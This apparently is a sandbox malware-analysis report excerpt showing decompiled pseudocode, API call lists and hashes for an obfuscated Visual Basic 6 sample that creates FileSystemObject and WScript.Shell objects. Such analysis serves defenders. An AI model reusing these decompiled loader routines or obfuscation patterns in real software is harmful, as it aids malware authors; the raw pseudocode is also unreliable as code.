				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
				_v8 = 0x11;
				if((_t219 | 0xffffffff) != 0) {
					_v8 = 0x12;
					_v44 = 0x29c1aa;
					_v8 = 0x13;
					_t223 = _v44 ^ 0x0018dd5b;
					_v44 = _t223;
					_v8 = 0x14;
					_push(0xffffffff);
					L004016E4();
					_v8 = 0x15;
					_push(0x3ed0fd);
					L004016B4();
					L0040183A();
					_push(_t223); // executed
					L004015FA(); // executed
					_v40 = _t223;
					L00401846();
				}
				asm("wait");
				_push(0x4207b8);
				_t221 =  &_v48;
				_push(_t221);
				_push(0);
				L0040173E();
				L00401846();
				return _t221;
			}






















































      0x004202f7
      0x00420306
      0x00420312
      0x0042031a
      0x0042031d
      0x00420324
      0x0042032b
      0x0042033a
      0x0042033d
      0x00420344
      0x0042034b
      0x00420352
      0x0042035c
      0x00420360
      0x00420361
      0x00420369
      0x0042036d
      0x0042036e
      0x00420373
      0x0042037d
      0x0042038a
      0x0042038b
      0x00420391
      0x00420392
      0x00420397
      0x004203a1
      0x004203a5
      0x004203a9
      0x004203aa
      0x004203ac
      0x004203b1
      0x004203bd
      0x004203c3
      0x004203d1
      0x004203ee
      0x004203d3
      0x004203d3
      0x004203d8
      0x004203dd
      0x004203e2
      0x004203e2
      0x00420400
      0x00420418
      0x0042041b
      0x0042041d
      0x0042042a
      0x0042044c
      0x0042042c
      0x0042042c
      0x0042042e
      0x00420433
      0x00420439
      0x0042043f
      0x00420444
      0x00420444
      0x00420456
      0x0042045c
      0x00420463
      0x0042046f
      0x00420470
      0x0042047d
      0x0042047e
      0x0042047f
      0x00420480
      0x00420486
      0x00420490
      0x004204a4
      0x004204aa
      0x004204ac
      0x004204b9
      0x004204de
      0x004204bb
      0x004204bb
      0x004204c0
      0x004204c5
      0x004204cb
      0x004204d1
      0x004204d6
      0x004204d6
      0x004204e8
      0x004204f0
      0x004204f5
      0x004204fc
      0x00420503
      0x0042050d
      0x00420511
      0x00420512
      0x00420517
      0x0042051e
      0x00420528
      0x00420529
      0x00420531
      0x00420532
      0x00420535
      0x00420536
      0x0042053b
      0x0042053c
      0x00420546
      0x0042054e
      0x00420556
      0x0042055a
      0x0042055e
      0x0042055f
      0x00420561
      0x00420566
      0x00420566
      0x00420569
      0x00420570
      0x00420572
      0x00420574
      0x00420576
      0x0042057b
      0x0042057c
      0x0042057e
      0x00420583
      0x0042058b
      0x004205a0
      0x004205a7
      0x004205b3
      0x004205bd
      0x004205c4
      0x004205d0
      0x004205da
      0x004205e1
      0x004205ed
      0x004205f7
      0x004205fe
      0x0042060a
      0x00420614
      0x0042061b
      0x00420627
      0x00420631
      0x00420638
      0x00420645
      0x00420648
      0x00420652
      0x00420653
      0x00420656
      0x00420657
      0x0042065c
      0x00420669
      0x0042067e
      0x0042066b
      0x0042066b
      0x00420671
      0x00420676
      0x00420676
      0x00420685
      0x00420688
      0x00420689
      0x00420693
      0x0042069d
      0x004206a3
      0x004206a7
      0x004206a8
      0x004206aa
      0x004206b2
      0x004206be
      0x004206c8
      0x004206cf
      0x004206db
      0x004206e5
      0x004206ec
      0x004206f8
      0x004206ff
      0x00420702
      0x00420709
      0x00420715
      0x00420717
      0x0042071e
      0x00420725
      0x0042072f
      0x00420734
      0x00420737
      0x0042073e
      0x00420740
      0x00420745
      0x0042074c
      0x00420751
      0x0042075b
      0x00420760
      0x00420761
      0x00420766
      0x0042076c
      0x0042076c
      0x00420771
      0x00420772
      0x004207a4
      0x004207a7
      0x004207a8
      0x004207aa
      0x004207b2
      0x004207b7

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420312
      • #575.MSVBVM60(?,00000003), ref: 00420361
      • #518.MSVBVM60(?,?,?,00000003), ref: 0042036E
      • __vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420392
      • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 004203AC
      • __vbaNew2.MSVBVM60(004025A8,004223C0,?,?,?,00401546), ref: 004203DD
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 0042043F
      • __vbaChkstk.MSVBVM60(00000000,?,00402598,00000014), ref: 00420470
      • __vbaStrI4.MSVBVM60(005E4C2E), ref: 00420486
      • __vbaStrMove.MSVBVM60(005E4C2E), ref: 00420490
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,0000013C), ref: 004204D1
      • __vbaFreeStr.MSVBVM60(00000000,?,004025B8,0000013C), ref: 004204E8
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,0000013C), ref: 004204F0
      • #573.MSVBVM60(?,00000002), ref: 00420512
      • __vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 00420536
      • #628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 0042053C
      • __vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 00420546
      • __vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 0042054E
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 00420561
      • __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420583
      • #564.MSVBVM60(00000004,?), ref: 00420657
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 00420671
      • __vbaI4Var.MSVBVM60(?), ref: 00420689
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 004206AA
      • __vbaOnError.MSVBVM60(000000FF), ref: 00420740
      • __vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 00420751
      • __vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 0042075B
      • #578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420761
      • __vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 0042076C
      • __vbaAryDestruct.MSVBVM60(00000000,?,004207B8), ref: 004207AA
      • __vbaFreeStr.MSVBVM60(00000000,?,004207B8), ref: 004207B2
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
      • String ID: FOSTERET
      • API String ID: 53557705-1574993597
      • Opcode ID: 357550e6aca80136ed24dfcc9f92b10dd82c1975d56e8b7263cb22f4615f174a
      • Instruction ID: e7f4f47f126e483349b2a478d40d0fbd951d919c9590c0102a108f012e538fed
      • Opcode Fuzzy Hash: 357550e6aca80136ed24dfcc9f92b10dd82c1975d56e8b7263cb22f4615f174a
      • Instruction Fuzzy Hash: F6D1F8B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E6DD, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 46%
      			E0041E6DD(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v76;
				intOrPtr _v84;
				signed int _v108;
				char _v116;
				short _v120;
				char* _t30;
				char* _t33;
				short _t34;
				short _t35;
				intOrPtr _t56;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(0x68);
				L00401540();
				_v12 = _t56;
				_v8 = 0x401310;
				L004017B6();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52); // executed
				L004016F0(); // executed
				_t30 =  &_v52;
				_push(_t30);
				L004016F6();
				_push(_t30);
				_push( &_v28);
				L004016FC();
				L00401828();
				_v76 = L"Gulsoterne";
				_v84 = 8;
				_v108 = _v108 & 0x00000000;
				_v116 = 0x8002;
				_push(0x10);
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v28);
				_t33 =  &_v52;
				_push(_t33); // executed
				L004016EA(); // executed
				_push(_t33);
				_t34 =  &_v116;
				_push(_t34);
				L00401738();
				_v120 = _t34;
				L00401828();
				_t35 = _v120;
				if(_t35 != 0) {
					_push(0x9ae);
					L0040169C();
					L0040183A();
					_push(L"Propreste7");
					_push(L"Desorganisationens");
					L00401696();
					L0040183A();
				}
				_push(0x41e806);
				L00401846();
				L004017C2();
				L00401846();
				L00401846();
				return _t35;
			}




















      0x0041e6e2
      0x0041e6ed
      0x0041e6ee
      0x0041e6f5
      0x0041e6f8
      0x0041e700
      0x0041e703
      0x0041e710
      0x0041e715
      0x0041e717
      0x0041e71f
      0x0041e720
      0x0041e725
      0x0041e728
      0x0041e729
      0x0041e72e
      0x0041e732
      0x0041e733
      0x0041e73b
      0x0041e740
      0x0041e747
      0x0041e74e
      0x0041e752
      0x0041e759
      0x0041e75c
      0x0041e766
      0x0041e767
      0x0041e768
      0x0041e769
      0x0041e76a
      0x0041e76c
      0x0041e771
      0x0041e774
      0x0041e777
      0x0041e778
      0x0041e780
      0x0041e781
      0x0041e784
      0x0041e785
      0x0041e78a
      0x0041e791
      0x0041e796
      0x0041e79c
      0x0041e79e
      0x0041e7a3
      0x0041e7ad
      0x0041e7b2
      0x0041e7b7
      0x0041e7bc
      0x0041e7c6
      0x0041e7c6
      0x0041e7cb
      0x0041e7e8
      0x0041e7f0
      0x0041e7f8
      0x0041e800
      0x0041e805

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E6F8
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E710
      • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E720
      • __vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E729
      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E733
      • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E73B
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E75C
      • __vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E778
      • __vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E785
      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E791
      • #697.MSVBVM60(000009AE,?,00000000), ref: 0041E7A3
      • __vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E7AD
      • __vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E7BC
      • __vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E7C6
      • __vbaFreeStr.MSVBVM60(0041E806,?,00000000), ref: 0041E7E8
      • __vbaFreeObj.MSVBVM60(0041E806,?,00000000), ref: 0041E7F0
      • __vbaFreeStr.MSVBVM60(0041E806,?,00000000), ref: 0041E7F8
      • __vbaFreeStr.MSVBVM60(0041E806,?,00000000), ref: 0041E800
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
      • String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
      • API String ID: 3773181626-3836659718
      • Opcode ID: 11899bde4f72f4ab040b868e459969e1e0f3f5e16cf83ee1f324c2078b7b48f5
      • Instruction ID: 7bf0595288873c859a33f12b27558c18ca7e2994035cbf7e3e1bb4240f52a0b4
      • Opcode Fuzzy Hash: 11899bde4f72f4ab040b868e459969e1e0f3f5e16cf83ee1f324c2078b7b48f5
      • Instruction Fuzzy Hash: AC312B71910219ABDB14EBA2CD86EEEB378BF11708F60493EB101770E1EBBD56458B58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420FBC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 54%
      			E00420FBC(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				char _v40;
				char _v44;
				char _v60;
				char* _t18;
				char* _t20;
				char* _t22;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0x18;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t32;
				_t18 = 0x2c;
				L00401540();
				_v28 = _t32;
				_v24 = 0x4014e0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_t22 =  &_v40;
				L004017B6();
				_v8 = 2;
				_push(_t22);
				_push(_t22);
				 *_t32 =  *0x401520;
				L004015D6();
				L004015DC();
				asm("fcomp qword [0x401518]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004016E4();
					_v8 = 4;
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v60); // executed
					L004016F0(); // executed
					_t20 =  &_v60;
					_push(_t20);
					L004016F6();
					_push(_t20);
					_t18 =  &_v44;
					_push(_t18);
					L004016FC();
					L00401828();
				}
				asm("wait");
				_push(0x421093);
				L00401846();
				L004017C2();
				return _t18;
			}
















      0x00420fbf
      0x00420fc2
      0x00420fcd
      0x00420fce
      0x00420fd7
      0x00420fd8
      0x00420fe0
      0x00420fe3
      0x00420fea
      0x00420ff1
      0x00420ff8
      0x00421002
      0x00421005
      0x0042100a
      0x00421017
      0x00421018
      0x00421019
      0x0042101c
      0x00421021
      0x00421026
      0x0042102c
      0x0042102e
      0x0042102f
      0x00421031
      0x00421038
      0x0042103a
      0x0042103f
      0x00421046
      0x00421048
      0x00421050
      0x00421051
      0x00421056
      0x00421059
      0x0042105a
      0x0042105f
      0x00421060
      0x00421063
      0x00421064
      0x0042106c
      0x0042106c
      0x00421071
      0x00421072
      0x00421085
      0x0042108d
      0x00421092

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420FD8
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421005
      • #582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042101C
      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00421021
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 0042103A
      • #716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00421051
      • __vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 0042105A
      • __vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00421064
      • __vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 0042106C
      • __vbaFreeStr.MSVBVM60(00421093,?,?,?,?,?,?,00401546), ref: 00421085
      • __vbaFreeObj.MSVBVM60(00421093,?,?,?,?,?,?,00401546), ref: 0042108D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$#582#716AddrefChkstkCopyError
      • String ID: WScript.Shell
      • API String ID: 2682307056-813827646
      • Opcode ID: deaf4d01a33f772934ea93cd6ad290492f854ee3ec3ad5f1568ac79a7ad65f16
      • Instruction ID: 944aa939883ab1e2c8ed4a25b64ab62f1ff393ac31d9226d13a27ca46deec8f4
      • Opcode Fuzzy Hash: deaf4d01a33f772934ea93cd6ad290492f854ee3ec3ad5f1568ac79a7ad65f16
      • Instruction Fuzzy Hash: 08114CB1900208BBCB10EFA1DD46BDEBBB8AB04748F50456EF101771E1DBBD5A448B99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004210A6, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 54%
      			E004210A6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401540();
				_v12 = _t76;
				_v8 = 0x401528;
				L004016FC();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x402318);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004016FC();
				L004015D0();
				_v28 = E004212F5( &_v36);
				L004017C2();
				_v32 = E004212F5(_v28) + 0x2b0;
				E00421375(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x402318);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v88 = _t62;
				}
				_push(0x4211e9);
				L004017C2();
				return _t62;
			}






















      0x004210a6
      0x004210b7
      0x004210c1
      0x004210c9
      0x004210cc
      0x004210da
      0x004210eb
      0x004210ee
      0x004210f0
      0x004210f7
      0x00421110
      0x004210f9
      0x004210f9
      0x004210fb
      0x00421100
      0x00421103
      0x00421106
      0x0042110b
      0x0042110b
      0x00421117
      0x00421121
      0x0042112a
      0x00421135
      0x0042113b
      0x0042114d
      0x00421156
      0x0042115b
      0x00421162
      0x00421169
      0x00421170
      0x0042117a
      0x00421184
      0x00421185
      0x00421186
      0x00421187
      0x0042118b
      0x00421195
      0x00421196
      0x00421197
      0x00421198
      0x004211a1
      0x004211a7
      0x004211a9
      0x004211b0
      0x004211cc
      0x004211b2
      0x004211b2
      0x004211b7
      0x004211bc
      0x004211bf
      0x004211c2
      0x004211c7
      0x004211c7
      0x004211d0
      0x004211e3
      0x004211e8

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 004210C1
      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004210DA
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402318,00000058), ref: 00421106
      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00421121
      • #644.MSVBVM60(?,?,?), ref: 0042112A
      • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0042113B
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042117A
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042118B
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402318,000002B0), ref: 004211C2
      • __vbaFreeObj.MSVBVM60(004211E9), ref: 004211E3
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
      • String ID:
      • API String ID: 1032928638-0
      • Opcode ID: 4fd3d277d7e783eea0b544b6a53039107707f08567be8f02d431a2a7c5f571ac
      • Instruction ID: ab9153657501acb1fefc5138af80b2a23d5e1def48e047e3fe96750a5816e847
      • Opcode Fuzzy Hash: 4fd3d277d7e783eea0b544b6a53039107707f08567be8f02d431a2a7c5f571ac
      • Instruction Fuzzy Hash: A2413671900218EFDF01DF91C846BDEBBB5FF19744F10042AF901BB1A1C7B999458B58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 237 401888-4018ad #100 238 4018ae-4018f7 237->238 240 4018f9-40193e 238->240 241 401940-401943 240->241 242 4019a6-4019aa 240->242 244 4019ab-4019fc 241->244 245 401946-401997 241->245 242->244 245->242
      C-Code - Quality: 84%
      			_entry_(signed int __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi) {
				signed int _t110;
				signed char _t117;
				signed char _t119;
				intOrPtr* _t121;
				intOrPtr* _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				signed char _t133;
				intOrPtr* _t135;
				intOrPtr* _t136;
				signed char _t139;
				intOrPtr* _t140;
				intOrPtr* _t141;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				signed char _t147;
				signed int _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t155;
				signed int* _t158;
				void* _t159;
				void* _t160;
				intOrPtr* _t163;
				void* _t167;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				intOrPtr* _t173;
				intOrPtr* _t176;
				void* _t177;
				void* _t180;
				void* _t186;
				signed int _t194;
				intOrPtr* _t200;
				intOrPtr _t206;

				_push("VB5!6&*"); // executed
				L00401882(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t110 = __eax + 1;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *((intOrPtr*)(_t177 - 0x706704eb)) =  *((intOrPtr*)(_t177 - 0x706704eb)) + _t110;
				_t155 = _t110;
				asm("fimul word [ecx-0x50]");
				_pop(ss);
				 *(__ecx + 0x42) =  *(__ecx + 0x42) ^ 0xffffffe2;
				asm("ror byte [edi], cl");
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				_t163 = __ecx - 1;
				asm("outsb");
				_t178 =  *[fs:edi+0x62] * 0x6c;
				if (_t178 >= 0) goto L1;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx + __ebx;
				 *__ebx =  *__ebx ^ __ebx;
				 *_t163 =  *_t163 + __edx;
				_push(__edx);
				_pop(ss);
				asm("std");
				asm("outsd");
				_push(__ebx);
				_t193 = 0x60c3cf83;
				_t167 = __ebx - 1;
				asm("jecxz 0xffffffb7");
				_t170 = __edi - 1;
				asm("lodsd");
				asm("stosb");
				 *0xFFFFFFFFFFFFFFF0 =  *((intOrPtr*)(0xfffffffffffffff0)) + 0x1d;
				_t117 = _t155 ^  *0xFFFFFFFFF12C3970;
				_t157 = 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				 *_t117 =  *_t117 + 0x1d;
				_push(0x1d);
				 *_t117 =  *_t117 + 0x1d;
				 *__esi =  *__esi + 0x3a1a6a0a;
				 *_t117 =  *_t117 + 0x1d;
				 *(_t117 + _t117) =  *(_t117 + _t117) + 0x3a1a6a0a;
				_t173 = __esi + 1;
				_t200 = _t173;
				asm("outsd");
				if(_t200 < 0) {
					L5:
					_t117 = _t117 + 1;
					 *_t117 =  *_t117 + _t157;
					_t167 = _t167 + 1;
					goto L6;
				} else {
					asm("popad");
					if(_t200 != 0) {
						if(_t200 >= 0) {
							asm("outsb");
							_t151 = _t117 ^ 0x00000000 | 0x44000b01;
							_push(_t167);
							_push(0x60c3cf83);
							_t186 = _t178 + 2 - 1 + 2;
							 *0x3a1a6a0a =  *0x3a1a6a0a + 0x1e;
							 *_t151 =  *_t151 + _t151;
							_t167 = _t167 + 1;
							 *0x3A1A6A28 =  *((intOrPtr*)(0x3a1a6a28)) + _t151;
							 *((intOrPtr*)(_t186 + 0x43 + _t151 * 2)) =  *((intOrPtr*)(_t186 + 0x43 + _t151 * 2)) + 0x1d;
							_push(_t167);
							_t176 = _t173;
							_push(0x60c3cf84);
							_t178 = _t186 + 1 - 1 + 2;
							 *0x1b5b =  *0x1b5b + _t167;
							 *0xc000014 = 0x1d;
							asm("adc eax, [eax]");
							_t152 = _t151 + 0x1e;
							_push(ds);
							 *_t152 =  *_t152 + 0x1d;
							_t193 = 0x60c3cf86;
							 *((intOrPtr*)(_t176 + 3)) =  *((intOrPtr*)(_t176 + 3)) + 0x1d;
							 *((intOrPtr*)(_t176 + _t152)) =  *((intOrPtr*)(_t176 + _t152)) + 1;
							 *_t152 =  *_t152 + 0x1d;
							 *((intOrPtr*)(0x3a1a6a0a + _t176 + 0x10040)) =  *((intOrPtr*)(0x3a1a6a0a + _t176 + 0x10040)) + 0x3a1a6a0a;
							_t117 =  *0x4021;
							 *_t117 =  *_t117 + _t117;
							_t157 = 0x3c;
							asm("invalid");
							asm("invalid");
							asm("invalid");
							 *_t117 =  *_t117 + 1;
							 *_t117 =  *_t117 + _t117;
							 *((intOrPtr*)(_t167 + 0x40)) =  *((intOrPtr*)(_t167 + 0x40)) + _t167;
							goto L5;
						}
						L6:
						 *_t117 =  *_t117 + _t117;
						 *_t117 =  *_t117 + _t117;
						 *((intOrPtr*)(_t117 - 0x23)) =  *((intOrPtr*)(_t117 - 0x23)) + _t167;
						_pop(_t173);
						 *_t117 =  *_t117 + _t117;
						 *_t117 =  *_t117 + _t117;
					}
				}
				 *_t117 =  *_t117 + _t117;
				 *_t117 =  *_t117 + _t117;
				 *_t117 =  *_t117 + _t117;
				 *_t117 =  *_t117 + _t117;
				asm("sbb [eax], eax");
				_push(_t173);
				_t168 = _t167 + 1;
				_t119 = _t117 + _t117 ^ 0x2a263621;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t173 =  *_t173 + _t157;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				_t121 = (_t119 |  *_t119) + 4;
				 *_t121 =  *_t121 + _t121;
				 *_t121 =  *_t121 + _t121;
				 *_t121 =  *_t121 + _t121;
